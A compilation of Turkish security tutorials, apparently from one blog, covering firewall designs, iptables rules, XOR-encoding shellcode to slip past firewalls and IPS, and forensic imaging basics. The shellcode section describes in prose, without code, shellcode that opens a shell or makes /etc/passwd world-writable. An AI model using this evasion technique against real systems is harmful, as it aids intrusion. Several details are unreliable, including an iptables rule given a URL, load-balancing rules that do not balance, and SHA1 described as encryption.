Çift taraflı geçit tipinde firewall türüdür. Paket filtrelemeli fırewalldan farklı olarak, çift taraflı geçit mekanizması, internet ile ağ arasındaki IP trafiğini (Proxy tarafından kullanılan servisler hariç) tamamen bloke eder. Servisler ve sistemlere erişim, bu geçitteki (gateway’deki) Proxy sunucusu tarafından sağlanır. Basit ve emniyetli bir firewall türüdür. Bu yapıda Proxy tarafından izin verilmeyen hiçbir hizmet kabul edilmez. Dışarıdan gelen hiçbir paketin vekil sunucuyu geçmeden korunan ağa girmesi mümkün değildir.

Bu firewall türü IP yönlendirme özelliği etkisizleştirilmiş bir uygulama düzeyinde çalışan ağ geçidinden ve filtreleme yapabilen (perdeleyici) yönlendiriciden oluşur. Bu yönlendirici sayesinde, içerisinde değişik sunucuların bulunduğu, perdelenmiş bir alt ağ oluşturulur.

Alt ağ (subnet) sadece firewall tarafından bilinir ve algılanır. İnternet üzerinde bu ağa ait bir bilgi bulunmaz. Bu sayede ağ içindeki isimler ve IP adresleri internet sistemlerinden saklanır. Çünkü firewall DNS bilgilerini saklar ve dışarıdan hiç kimse korunan ağdaki ip adreslerini ve isimleri bilemez.

Bu firewall türü ağa gelen ve giden veriler ile bilgi sunucusunun trafiğini ayırma imkanı sağlar. Bilgi sunucusu, geçit-gateway ile yönlendirici-router arasında alt ağa yerleştirilir. Ağ geçidinin (gateway) bilgi sunucusu için uygun proxy servisleri sağladığını farzedersek (ftp , gopher veya http gibi) yönlendirici (router), firewall’a doğrudan erişimi önleyebilir ve erişimleri firewall’un denetlemesine tabi tutar. Bilgi sunucusunun bu şekilde yerleştirilmesi ağ sistemlerine ulaşımı engellediğinden dolayı emniyetli bir metottur.

Bu yapıda vekil sunucu, TELNET, FTP ve merkezi e-posta gibi hizmetlere izin verebilir. Güvenlik duvarında gerekli as+ıllama ve yetkilendirme bilgileri tutulabilir. Ayrıca, erişim kayıtları da tutularak saldırı aktiviteleri izlenebilir. Uygulama ağ geçidi ile yönlendirici arasına başka hizmetler veren sunucular yerleştirilebilir. Bu sunucular, dışarıya IP adresi ve ismi verilmeden, uygulama ağ geçidi üzerinden dışarı bağlanabilecekleri gibi (eğer vekil sunucu bu hizmet desteğini veriyorsa), doğrudan dışarıdan gelen istekleri de alabilirler. İkinci durumda ise diğer hizmetleri veren sunuculara yapılacak olan saldırılarda, uygulama ağ geçidine takılacaklarından korunan ağa bir saldırı gerçekleştirilemez.

Bu firewall türünün bir dezavantajı vardır. Korunan ağdaki istemcilerin diğer sunuculardan hizmet alabilmek için uygulama ağ geçidinden geçmek zorunda olmaları, ağ geçidi üzerinde yoğun bir trafik oluşturur. Bu da performans düşüklüğüne neden olur. Ayrıca, bazı hizmet veren sunucular (LOTUS Notes, SQLnet gibi) için Proxy desteği bulunmadığından, korunan ağdan bunlara erişim yapılamaz. Erişilmesi gereken servisler için bu servisleri veya sistemleri geçidin internet tarafına yerleştirmek gerekir. Bunu ayrı bir yönlendirici geçit ile asıl yönlendirici arasında bir alt ağ oluşturacak şekilde gerçekleştirebilir.

3)Screened Host Firewall

Perdelenmiş kullanıcı tipindedir. Güvenlik alanında çift taraflı geçit tipindeki firewalllara göre daha esnektir. Yönlendiricinin korunmalı durumdaki alt ağ tarafına yerleştirilen uygulama geçidi ile paket filtrelemeli yönlendiriciyi birleştirir. Uygulama geçidi sadece bir network ara birimine ihtiyaç duyar. Uygulama geçitlerinin proxy servisleri, ağ sistemindeki bazı proxyler için telnet, ftp ve diğer veri paketlerini geçirebilir. Yönlendirici filtreleri ve perdelemeler, uygulama geçidi ve ağ sistemlerine ulaşımı kontrol ettiğinden dikkat edilmesi gereken protokollerdir ve uygulama trafiğini yönlendirirler.

Yönlendirilmek üzere uygulama geçidine internet ağlarından gelen trafik kabul edilir. İnternet ağlarından gelen diğer tüm trafik geri çevrilir. Uygulama geçidinden gelmedikçe, yönlendirici içeriden gelen herhangi bir uygulama trafiğini reddeder.

4) Screened Subnet Firewall

Çift taraflı geçit ile perdelenmiş host tipi güvenlik duvarının birleşimidir.

Bu yapıda perdelenmiş bir alt ağ oluşturmak için iki perdeleyici yönlendirici kullanılır. Bunların arasında kalan alana perdelenmiş alt ağ veya askerden arındırılmış bölge (DMZ – Demilitarized Zone) denir. Bu bölgede birkaç tane uygulama ağ geçidi ve istenirse diğer hizmetleri veren bazı sunucular bulunur. Korunan ağdan dışarı çıkmak isteyenler, yönlendiricilerden ilki tarafından uygulama ağ geçidine yönlendirilirler. Eğer DMZ’de bulunan diğer sunuculardan hizmet almak istiyorlarsa, yönlendirici tarafından uygulama ağ geçidine uğramadan bu sunuculara yönlendirilirler. Bu, dual-homed firewall türüne göre daha esnek bir yapı sağlar. Ayrıca, uygulama ağ geçidi üzerinden yükü azaltarak performans artışını sağlar. Ancak, DMZ’de bulunan diğer sunucuların çok iyi korunması gerekir.

Firewall ile modemin entegrasyonu da önemli bir konudur. Biraz da bundan bahsedelim.

Birçok ağda, ağdaki modemlere telefon hattından erişmek backdoor açığıdır. Bu firewall ile kurulan korumayı tamamen etkisiz duruma getirir. Bunu önlemenin yolu modemlerin tümüne erişimi, tek bir güvenli ana modem girişinde toparlamaktır. Ana modem girişi düzenlemesi, modemlerin ağa bağlantısını sağlamak amacıyla yapılmış bir terminal sunucu üzerinden gerçekleştirilebilir.

Modem kullanıcıları önce terminal sunucusuna bağlanır, oradan da diğer sistemlere erişir. Bu türden bazı terminal sunucuları, özel sistemlere bağlantıları kısıtlayabilen ilave güvenlik özelliği de sağlarlar. Bir diğer alternatif de, terminal sunucusuı, modemlerin bağlandığı bir ana makine de olabilir.

Modemlerden yapılan bağlantılar internetten yapılan bağlantılarda olduğu gibi bir takım tehditlere açık olduğundan izlenmeleri ve emniyetlerinin sağlanması gerekir. Bu nedenle ana modem sunucusunu fırewallun dışında oluşturmak gerekir. Böylece modemle yapılacak bağlantılar firewall içinden geçeceği için güvenlik sağlanmış olur.

Sistemin dezavantajı ise, modem sunucusunun internete doğrudan bağlanması ve bu yüzden saldırıya açık olmasıdır. Ana sunucuya bağlanabilen bir saldırgan yine bu sunucunun üzerinden diğer ağlara giriş yapabilir. Bu sebeple ana modem sunucusundan, başka ağlara yapılacak bu tür bağlantılar engellenebilmelidir.

Bilgisayar kullanıcıları sadece virüs tehdidi altında değildir. Aynı zamanda bilgisayarımızda bulunan kişisel verilerimizin tümü güvenlik riski oluşturur. Firewallar sayesinde tamamen korunamasak da bu tehdidi en aza indirmiş oluruz. Güvenlik duvarı sayesinde korunabileceğimiz diğer tehditlerse şunlardır:

• Remote Login – Uzaktan Erişim
• Aplication backdoors – Arkakapı uygulamaları
• Dos (denial of service) attacks – Servis reddi atakları
• Smtp Session Hijacking – Eposta protokolü oturum çalınması
• Operating system bugs – İşletim sistemi hataları
• Email bombs – Eposta bombaları
• Macros – Makrolar
• Bilgisayar Virüsleri
• Spam – Zararlı epostalar
• Source rating – Kaynak Saptırma
• Redirect Bombs

Kısaca anlatmak istediğimiz şudur:
Paket filtreleyici güvenlik duvarları basit bir güvenlik çözümü sağlarlar ve paketlerdeki verinin içeriğine bakmazlar.

Devre düzeyindeki güvenlik duvarları dışarıdan gelen paketler için tek giriş noktasıdır. Dışarıdaki bilgisayarlar sadece bunun adresini bilirler. Böylelikle, arkasındaki ağı güvenli bir şekilde korur.

Uygulama düzeyindeki güvenlik duvarları ise bilginin içeriğine bakarak paketi geçirip geçirmeyeceğine karar verir. Asıllama ve yetkilendirme mekanizmaları kullanır.

Güvenlik duvarları kullanılarak değişik güvenlik yapıları oluşturmak mümkündür. Çift-geçit tipi güvenlik duvarları daha güvenli bir yapı sunarken, performans ve esneklik bakımından perdelenmiş alt ağ güvenlik duvarlarından daha düşük seviyededirler.

Güvenlik hayatımızın her alanında aradığımız ilk koşuldur. Kendimizi, bilgilerimizi güvence altına almak için de firewallara ihtiyacımız vardır. Güvenlik duvarları sayesinde bilgisayar ağlarımızı ve internete bağlı olan araçlarımızı korumuş oluruz.

Tıpkı Wayne Dyner’in dediği gibi ‘Sadece güvensiz güvenlik olmaması için çaba harcıyoruz’.

TR | Enine Boyuna Firewall CypmUni OMÜ

IPTables Nedir?

Kernel bazında çalışan ağ paketlerini inceleyebileceğimiz müdahalede bulunabileceğimiz,Linux üzerinde çalışan bir güvenlik duvarı( ateş duvarı (firewall))dır.Oldukça kullanışlı bir araçtır kendisi.Linux üzerinde ki hangi tool/yazılım değil ki ?

Bilinmesi Gereken Komutlar & Kavramlar.

• ACCEPT : Gelen giden paketleri kabul etmek için kullanılır.
• DROP : Gelen giden paketleri düşürmek için kullanılır.
• REJECT : Gelen giden paketleri reddetmek için kullanılır.Drop’dan farkı kullanıcıya bunun hakkında bilgi verilir.
• FORWARD : Gelen giden paketleri yönlendirmek için kullanılır.
• INPUT : Gelen paketler için kullanılır.
• OUTPUT : Giden paketler için kullanılır.

Biraz Pratik

Sıfır bir iptables ayarlarına bir göz atalım isterseniz.

iptables -L -n --line-numbers

Tam halini görmek için : defaultrules.txt on github

1. -L :  Kuralları listeler.
2. -n : Burada ip ve portlarını bize göstermesini istediğimizi belirtiyoruz.DNS isim çözümlemesi kullanmaz bu yüzden hızlı bir şekilde listeleme yapar.
3. –line-numbers : Kuralları kural tipine göre satır numaralarıyla birlikte gösterir.

Bir ip adresini drop edelim isterseniz.Şuan elimde web for pentesterın imajı var.Hemen ip almasını sağlayalım.

Gördüğünüz gibi 192.168.1.42 ip’sini almış.

iptables -I OUTPUT -d 192.168.1.42 -j DROP

Bu kodu şimdi aşama aşama görelim.

• -I : Insert kelimesinin ilk harfi yani burada kural eklemek istediğimizi söylüyoruz.
• OUTPUT : Verdiğimiz ip adresine veri gönderimini engellesin.
• -d : Destination kelimesinin ilk harfidir.Yani hedefi 192.168.1.42 olan paketleri engelle.
• -j : Jump kelimesinin kısaltması olarak kullanılmış.Kural için hedef gösteriliyor burda.Yani bu kurala uyan paket drop edilsin şeklinde hikayeleştirilebilir sanırım.

Şimdide bir domain engelleyelim isterseniz.

iptables -I OUTPUT -d https://www.canyoupwn.me -j DROP

İyi hoş güzel biz engelliyoruz ama lazım oldu bunu kaldırmak istedik o zaman nasıl yapacağız ?

O zaman ilk önce şöyle komut gireceğiz.

iptables -L -n --line-number | grep “ipadresi”

Şaka şaka evet bu yöntemi de kullanabilirsiniz ama kurallarınız çoğaldığın da bu bir sorun olacak.

Iptables -L OUTPUT -n --line-number

Bu şekilde eklediğiniz kuralları görebiliyorsunuz.”–line-number” komutunu verdik ki silerken satır satır silmemizde bize kolaylık sağlasın diye.

Silmek için aşağıda ki komut yeterlidir.

iptables -D OUTPUT 1

Kodumuza daha yakından bakalım.

• -D : Delete’in ilk harfi.Yani silmek istediğimizi belirtiyoruz.
• OUTPUT : Çıkış yapan paketleri engellemek istediğimizi belirtiyoruz.
• 1 : 1.Numaralı satır demektir.

Şu ana kadar hep engellerken -d parametresini kullandık.İsterseniz source’un ilk harfi olan -s i kullanabilirsiniz.Bu da şu anlama gelir.Şöyle örnekle açıklayalım.

iptables -I INPUT -s 192.168.1.42 -j REJECT

Burada kaynağı yani bize paket gönderen 192.168.1.42 olur ise onu reddet diyoruz.

IPTables ile istersek belirli portalara gelen istekleri veya giden istekleri de engelleyebiliyoruz.Mesela bir şirkette çalıştığımızı düşünelim ve 80 portunun çıkışını engelleyelim ama girişi olsun.

iptables -I OUTPUT -p tcp --dport 80 -j DROP

Bu şekilde engelleyebiliyoruz.Ama bilirsiniz uzak bir ülkede telekom firması da bu şekilde 3 ay boyunca borcunuzu ödemediğiniz takdirde 80 portunu kapatıyordu fakat bir sorun vardı https üzerinden internete ( yavaşda olsa ) çıkabiliyorduk.İşte yukarıda yazdığımız kod ile biz de böyle bir artık açık mı  dersiniz ne dersiniz ona sebebiyet verdik :).Burada –dport yerine –sport da kullanarak source port ( kaynak port ) engelleyebilirsiniz.

Aslında bu şekilde kişisel bilgisayarınızda bir kod ile bunu sağlar iseniz ssl sertifikası olmayan siteye girmemiş olursunuz.

İsterseniz şimdide bize ping atanları engelleyelim ne dersiniz ? Yani sadece ping atmalarını engelleyeceğiz diğer her işlevi yapabilicekler.( Fişi çekmekten iyidir )

iptables -I INPUT -p icmp --icmp-type echo-reply -j DROP

Eğer bizden bir ping çıkmasın istiyorsanız.

iptables -I OUTPUT -p icmp --icmp-type echo-request -j DROP

Genel anlamda aslında iptables ın tüm argümanlarına değindik.Değişek tek şey ip’ler ve protokoller ( tcp / udp ) . Bahsetmediğimiz birkaç şey kaldı bunlarda interface seçmek,load-balancing,time limit ve port yönlendirme.

İnterface seçimi :
INPUT interface:

iptables -I OUTPUT -d 192.168.1.43 -i wlan1 -j DROP

Kod tamamen örnek amaçlıdır.Burada -i input interface(Paketin alındığı arayüz) anlamına gelir.

OUTPUT interface

iptables -I OUTPUT -d 192.168.1.43 -o wlan1 -j ACCEPT

Burada -o output interface ( Paketin gönderildiği arayüz )  anlamına geliyor.

Time-limit:

Bu kodumuzda ise paketlerin alınma veya yollanma sıklığını belirleyebiliyoruz.

Kodumuza şöyle birşey eklerisek yeterli gelicektir.

iptables -m limit --limit sıklık/zaman(Hour veya Second cinsinden )

iptables -m limit --limit 10/5s -j DROP

Load-Balancing ( yük dengeleme ) :

Bazı sistemlerde yük dengelemeye ihtiyaç duyulabilir ki duyulması da gerekir aksi takdirde yük dağıtımı olmadığı zaman sistemin çalışmasında sıkıntılar meydana gelecektir.İşte bu gibi durumlar içinde iptables da argümanlarımız bulunuyor.

iptables -I PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1 

iptables -I PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.2

Burada hedefi 80 olan tüm paketleri iki sunucu arasında paylaştırdık.

Port yönlendirme :

iptables -t NAT -I PREROUTING -p tcp -d 192.168.1.5 --dport 500 -j DNAT --to 192.168.1.100:300

Burada -t argümanı table ( tablo ) dan gelmektedir.Yani nat tablosuna ekliyoruz bu kuralı.

Burada hedefi 192.168.1.5:500 olan bir isteği 192.168.1.100:300 e yönlendirdik.



Herhangi bir yerde hata görürseniz bildirmekten çekinmeyiniz teşekkür ederim.

• Fiziksel / GRUB Güvenliği
• Disk Güvenliği
• Dosya Güvenliği
• Kullanıcı Güvenliği
• Root Güvenliği
• Gereksiz Servislerin Kapatılması
• PAM Modülü
• IP Tables
• TCP Wrappers
• ssh Sıkılaştırması
• History Formatının Düzenlenmesi
• BASH Aktivitelerinin Loglanması
• Varnish
• Mod Evasive
• Apache Sıkılaştırması
• PHP Sıkılaştırması

TR | IPTables Enes ERGÜN

Shellcode‘lar, bir exploit‘in veya yazılmış zararlı yazılımdan sonra yapılacak işlemleri yapan kod parçalarıdır. Haliyle hedef sistem de mevcut olabilecek, Firewall, IPS&IDS gibi çözümler bu saldırılara bir nebze olarak engelleme faaliyetleri sürdürecektir. Saldırı yapan kişiler de bu firewalları geçmek için belirli bir encoding haliyle göndermektedir.

XOR, bilgisayar mimarilerin de iki değerin aynı olması durumun da 0, farklı olması durumun da 1 set eder.

A – > 1
B – > 1

A xor B -> 0

C  -> 0
D -> 1

A xor B -> 1

Bir shellcode yazacağız.
Python ile XOR encoding edeceğiz.
Encoding hali, Assembly ile Decoding edip çalıştıracak..

Peki bu nasıl olacak, bizim yazdığım Shellcode’un byte byte hali ile XOR byte’mız ile Encoding edecek. Çıkan sonuç XOR Encoding shellcode olacak sonrasında biz bu Shellcodu tekrar Decoding edeceğiz.

Örneğin;

H -> 01001000
XOR Karakter M -> 01001101
XOR Encoding -> 00000101 haline gelecektir.
00000101 hex -> 0x5 gibi bir karaktere denk geliyor.

XOR anlatmak için basit’in basiti. H bu durum da shellcode, M ise 0xAA olmuş oluyor.
Bu 5 karakterini geri H karakterine çevirme işlemini yapacağız yani.

• Başlayalım, shellcode yazmaya başlamadan önce Python ile bir XOR Encode yazalım. Siz herhangi bir dil de seçebilirsiniz.

Program’dan bahsedelim, burada iki tane değişken söz konusu bir tanesi shellcode için diğeri encoded shellcode için ve bir döngüye tabi bu döngü byte dizisi uzunluğunda sürecek ve bu süreç de 0xAA ile XOR edip gerekli parametreleri ekleyecek.

Buna başlamadan önce yazdığımız Shellcode hakkında biraz bilgi vereyim.

Shellcode yazıldığın da her zaman yazmak istediğiniz işlemin fonksiyonun sistem çağrı numarası EAX registerına yazılır. Yani siz diyelim ki, passwd dosyasının çalıştırma yetkisini değiştirmek istiyorsunuz. Haliyle bu da bir fonksiyon chmod() fonksiyonu bunun sistem çağrısı Linux 32 bit’de 15 yani biz bu fonksiyonu kullanabilmemiz için 15 sistem çağrı numarasını EAX registerına atamamız gerekir.

Fonksiyonumuz birden fazla parametre alabilme ihtimalinden sırasıyla diğer registera atılır.

CHMOD örneğinden yola çıkalım.
chmod fonksiyonu çağrısı -> EAX
chmod fonksiyonu ilk parametresi -> EBX
chmod fonksiyonun ikinci parametresi -> ECX

• Chmod‘da ilk parametre yetkisini değiştirmek istediğiniz dosyanın path yoludur. passwd değiştirmek isterseniz, /etc/passwd‘un hex halini ilk önce stack‘e esp registerına oradan ebx return edebilirsiniz. ECX register’ına da 777 değerini atabilirsiniz.

Sonrası da int 0x80 ile kernel’i sahneye davet etmek.
Biz execve çalıştırdığımız için 11 sistem çağrısını al registerına atadık. Çalıştırmak istediğimiz programın path halini stack‘e atayıp geri çağırdık.

• sh çalıştırdığım için böyle bir resim oldu, siz path adreslerini değiştirerek istediğiniz dosyayı çalıştırabilirsiniz. Belirtmek de fayda var bazı programlar çalışabilmesi için parametre alması gerekebilir bu durum da shellcode patates olur.

• Yazdığımız shellcode‘un opcode‘larını çıkartık. Siz bu haliyle exploitlerinize ekleyebilirsiniz. Ama konu amacı bu değil. Çıkardığımız opcode‘ları XOR edeceğiz.

• Encoded ettik şimdi yeni bir shellcode oluşturalım. Bu shellcode xor edilmiş halini çalışırken decode edip çalıştıracak.

• Oklarla anlatmaya çalıştım ama yazı olarak da devam edeyim. _start ile işleme başlayıp call_decoder‘a atladık ve oraya atladığımız zaman decoder‘ı çağır dedi çağırdı. Decoder: tek tek işleyip decode: atladık sonra o da bir decoded olana kadar döngü işine girip Shellcode: atladı.  Assembly hali ile çalıştıracağınız zaman segmentation fault hatası verebilir. OS‘da bulunan belirli korumlardan dolayı çalıştırmadan opcodeları çekeceğiz tekrardan. Sonrasın da exploitimize ekleyeceğiz.

• Assembly‘i derleyip objdump ile opcode‘ları çektik şimdi yeni oluşturacağımız C dosyasına eklemek olacak. Siz exploitlerinize de ekleyebilirsiniz. Son rutuş.

Execute!

Analiz ve sonuç.

Assembly non-encode. 

XOR Encode

TR | XOR Encoded Shellcode CanYouPwnMe

Bilişim nedir? Bilişim suçları nelerdir?

İnsanların teknik, ekonomik ve toplumsal iletişimde kullandığı ve bilimin dayanağı olan bilginin, düzenli ve akla uygun bir biçimde, özellikle bilgisayarlar ve benzeri elektronik aygıtlar aracılığıyla işlenmesi bilimine bilişim denir.

Günümüz Türkiye’sinde “bilişim” kelimesine yerine modaya uyularak her ne kadar “siber” kelimesi kullanılsa da, sunumumuz da siber suçlar, siber analiz vs. değil bilişim suçları, bilişim analizi olarak bahsedeceğiz.
Bilişim suçları kavramı ülkeden ülkeye değişiklik gösterse de Batı’da çoğunlukla bilgisayar suçları (Computer Crimes), internet suçları (Internet Crimes), ileri teknoloji suçları (Hi-Tech Crimes), siber suçlar (Cybercrimes) ve bilgi teknolojileri suçları (IT Crimes) olmak isimleri ile anılmaktadır.

Türkiye’de en çok işlenen bilişim suçlarına;
* Sosyal Medya/e-posta hesabı çalma, ele geçirme, İletişimin yasal olmayan yollarla dinlenmesi, kaydedilmesi,
* İnternet bankacılığı dolandırıcılığı,
* Hacking,
* Kişisel verileri ele geçirme,  kopyalama ve yayınlanma-özel hayatın gizliliğini ihlali,
* Kredi kartı dolandırıcılığı/sahteciliği,
* Hakaret, tehdit, sövme, şantaj,
* Zararlı yazılım bulaştırma,
* Sistemi engelleme, bozma, verileri yok etme veya değiştirme,
örnekleri verilebilir.

Unutmamak gerekir ki eğer bir yerde suça konu bir olaydan bahsediyorsak kesinlikle olayla ilgili bir “insan” ve “para” faktörü vardır. Çünkü bu iki kavram suçun işlenmesinde insanlık tarihi boyunca en önemli faktörler olmuştur.

                                                   “ Ortam sanal olsa da işlenen suç gerçektir…”

Adli Bilişim: Bilişim sistemleri ve üzerinde bulunan depolama ünitelerinin, herhangi bir suçu işlemede veya yasaklanmış bir faaliyette kullanılıp kullanılmadığını tespit etmek amacıyla yapılan çalışmaların tümüdür.

Adli bilişim temelde olaya müdahale ve laboratuvar incelemesi şeklinde iki bölümden oluşur. Olaya müdahalede en hassas konu dijital delilin usulüne uygun, hukuki geçerliği olacak şekilde şüphe götürmeden elde edilmesidir. Daha sonra usulüne uygun elde edilen dijital deliller laboratuvar ortamında incelenerek raporlanır ve elde edilen sonuçlar ilgili mercilerle paylaşılır.

Adli bilişimin amacı; olay yerinde delillerin zarar görmeden tam, sağlam ve eksiksiz toplanmasını sağlayıp, daha sonra bu delilleri yazılım ve donanımları kullanarak inleme, analiz ve raporlama yaparak adli makamlara sunmaktır.

Adli Bilişimde analiz veya inceleme yapabilmek için öz olan donanım bilgilerine sahip olunması gerekmektedir.

BİOS ve BİOS’un Önemi

Bilgisayar donanımlarından anakart üstünde bulunan ve konum itibariyle çok küçük olmasına rağmen işlevsel yönden bilgisayarın en temel parçası olan bu aygıt ile bilgisayarın açılış sırasında yapması gereken tüm komutlar ve donanımsal olarak yapılması gereken tüm işlemleri denetleyen ve ayarlamalar bu parça üzerinden yapılır.
Bios pili bitince hafıza silinir ya da kayıtlar tutulmamaya başlanır.Örneğin, adli bilişim olayının ilk müdahale aşamasında olay yerindeki bilgisayar çalışır vaziyetteyse bilgisayar yeniden başlatılmamalı ve herhangi bir uygulama programı çalıştırılmamalıdır.  Bilgisayarın uygunsuz bir şekilde yeniden başlatılması Bios, tarih/zaman gibi birçok parametrede değişikliğe yol açabilir. HDD çıkarılıp imajı alındıktan sonra Bios’a girmek delil kaybına yol açmayacaktır. Bios’a girdikten sonra Bios saati ile gerçek saat karşılaştırılmalıdır. Bu karşılaştırma olayın çözülmesi için gerçekleşmesi gereken bir adımdır. Bunun için Bios bilgisi bir adli bilişim uzmanı için gereklidir.

CMOS ve CMOS’un Önemi

Günümüzde bütünleşmiş devreler de karşımıza çıksa da, bunun ile kısıtlı kalmayıp mikroişlemci, mikrodenetleyici, statik-RAM ve birçok dijital lojik devrede de kullanılmaktadır. Teknolojik aletler de uzun pil ömrü sağlanması isteği CMOS tarafından karşılanır. Bilgisayar gibi donanımlardan çok dijital fotoğraf makinelerinde kullanılan CMOS, dijital video çekimlerinde az ısınma özelliğinden dolayı çok tercih edilen uygun teknolojidir.
Sadece dijital devreler de değil analog devrelerde de kullanılan CMOS kamera sensörleri, data çeviriciler ve telsizlerde de kullanılmaktadır.

 Analiz İşlemleri

Bilgisayarlar dijital depolama ortamlarıdır. Bilgisayar analizi, bilişim veya başka bir suç için delil oluşturabilecek veriler ve donanımların korunması, incelenmesi ve inceleme sonuçlarını adli makamlara sunulacak şekle getirilmesi işlemlerine denilmektedir.

Adli Bilişim olaylarında dijital delillere ilk müdahale ve laboratuvar çalışması safları temel olarak:

Delilleri elde etme / bilgi toplama sırasında, olayın hikayesi, yeri zamanı, görgü tanıkları, çevre, zararın boyutu ve olayın sürekliliği büyük önem taşır.

Delillere müdahalede ise imaj işlemleri için plan yapılması,kullanılacak donanım ve yazılımların hazırlanması, personel ve olay yeri güvenliği, imaj alınacak ortam sağlanması, yapılan her işlemin fotoğraf ve video kayıt ile görüntü kaydının yapılması ve tüm işlemlerin detaylı bir şekilde tutanak tutulması sırası ile yapılacak müdahale öncelikleridir.

Dijital delile müdahalede kopya almak çok önemlidir asla orijinal veri ile çalışılmamalıdır.Adli bilişim olaylarında imaj ile çalışmak, delillerin kaybolmaması için vazgeçilmez bir husustur.

ADLİ KOPYA ALMA İŞLEMİ NEDİR?

Adli kopya herhangi bir dijital verinin özel bir yöntemle (çoğunlukla okuma izinli-read only) özel bir algoritma (MD5, SHA1 gibi) kullanılarak “bit bit” ya da “sektör sektör” kopyalanması ve doğrulanmasıdır.

NEDEN ADLİ KOPYA ALIRIZ?

Genelde bir işletim sisteminin bilgisayara yüklenmesi fazla zaman almaz. Ancak işletim sistemi kurulduktan sonra tanınmayan aygıtların sürücülerinin yüklenmesi, işletim sisteminin güncellemelerinin yapılması, kişisel ayarların yapılması ve gerekli yazılımların yüklenmesi büyük zamanlar alabilmektedir. Bu işler için her defasında zaman harcamamak için daha önceden hazırlanmış bir imaj kullanılabilir. İmaj alınırken aygıtın içeriği ve yapısı kopyalanır.
Oldukça uzun süren bu işlem yapılırken, bilgisayar da başka işlem yapılamaz. Aynı zaman da olay yerinde ya da herhangi bir anda imaj alınıyor ise elektrik kesintisine karşı önlemler alınmalıdır. Aksi takdir de imaj alma işlemi yarıda kalır.

Adli kopya alınmadan önce yapılması gerekenler:

1. Kopyalamada kullanılacak bilgisayara temiz bir işletim sistemi kurulmalıdır.
2. Kopyalamada kullanılacak bilgisayara uygun adli kopya yazılımı seçilmelidir.
3. İşletim sisteminin son güncellemeleri kurulmalıdır.
4. Bilgisayara ait donanım  sürücüleri güncelleştirilmelidir.
5. Bilgisayarda yeterli güvenlik tedbirleri alınmalıdır.
6. Elektrik kesilmesini riskine karşın kesintisiz güç kaynağı bulundurulmalıdır.
7. Adli kopyanın alınacağı bir ya da iki adet disk hazırda bulundurulmalıdır.

Adli kopya almada en çok kullanılan araçlar;

• Access Data FTK Imager  ile çeşitli formatlarda (EnCase, SMART, Raw, Sparce) imaj alma işlemi yapıldığı gibi, alınan imaja sonradan erişebilme, farklı bir formata dönüştürebilme ve imaj dosyasını disk sürücüsü gibi göstermeyi de sağlamaktadır.
• Guidance Software  EnCase Imager  ile EnCase delil dosyaları ve EnCase logical delil dosyaları oluşturulabiliyor fakat delil işleme, ön izleme ve analiz özellikler mevcut değil. Lisans gerektirmeyen ücretsiz bir yazılımdır.
• Forensic Imager farklı olaylara ait adli kopyaları gruplar halinde belirleyip bu gruplara ait tüm adli kopyaları aynı anda vakaya ekleyip birbiri üzerinde karşılaştırma ya da toplu inceleme yapmaktadır ve ücretli bir yazılımdır.
• TechPathways Prodiscover sabit disklerin Volume Shadow kopyalarını tespit edip bu kopyaların inceleme ve analizini yapmaktadır. Ücretli bir yazılımdır ve diğer yazılımlardan çok daha pahalıdır.
• Open Source GUYMAGER Linux üzerinden medya elde etmek için kullanılan ücretsiz bir yazılımdır.
  şeklinde örneklendirilebilir.

Adli kopya için kullanılacak diskin hiç kullanılmamış olması veya Wipe edilmiş olması, şüpheliye ait diske veri yazılmasının engellenmesi, bütün işlemlerin kayıt altına alınması, sistem saatinin kaydedilmesi, uçucu verileri kaybetmemek, ağ bağlantılarının tespit edilmesi vs. dijital delillerin analizinde dikkat edilmesi gerek hususlardandır.

Çevrede farklı dijital veri depolama aygıtları bulunabilir. Bu yüzden bir Adli Bilişim Uzmanı/Mühendisi her zaman açıkgözlü olmalıdır.
Dijital delillerde analiz için biri olay yerinde biri laboratuvar da olmak üzere daima çift kopya alınmalıdır.

Adli Kopya almasa sırasında, bilgisayar(sistem) açıksa veya kapalıysa;

Adli bilişim olaylarında bir şeyin delil sayılabilmesi için tutarlı, akla uygun, gerçek ve hakiki, tam, eksiksiz, güvenilirlik ve inanılabilirlik gibi hususları barındırması gerekmektedir.

Hash Değerinin Önemi

MD5 Nedir?

Message Digest 5 (MD5) algoritması, verilen dosyanın veya mesajın (şifre vb.) kendine has “parmak izi” nin oluşturulmasını “hash” fonksiyonlarına dayalı olarak sağlayan bir algoritmadır. Girdi verinin boyutundan bağımsız olarak 128 bitlik hexadecimal karakterde özetler üretir. Herhangi bir uzunlukta verilen mesajı (veya dosyayı) alıp fazla uzun olmayan bir harf ve sayı dizisine çevirir.

SHA1 Nedir?

Secure Hashing Algorithm olarak adlandırılan, şifreleme algoritmaları içerisinde en yaygın olarak kullanılan algoritma olduğu kabul gören SHA1, United States National Security Agency tarafından tasarlanmıştır.
SHA1 algoritması ile sadece şifreleme işlemi yapılır, şifre çözümleme işlemi yapılamaz.

Dijital delillerin analizinde Hash değeri önemli bir yere sahiptir. Çünkü verinin imzası niteliğindedir. Hash değeri verinin değişikliğe uğrayıp uğramadığını kontrol amaçlı kullanılır.

TR | Adli Bilişimde İnceleme Ve Analiz CypmUni FÜ